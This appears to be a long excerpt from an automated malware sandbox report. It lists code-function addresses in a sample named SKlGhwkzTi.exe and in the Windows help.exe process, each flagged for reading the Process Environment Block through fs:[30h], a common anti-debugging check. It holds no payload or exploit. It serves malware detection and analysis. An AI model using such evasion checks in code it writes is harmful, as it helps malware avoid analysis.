          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01922073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01935BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01893B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01878A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01883A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01918DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01913D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01887D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01878794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01864F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01898E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
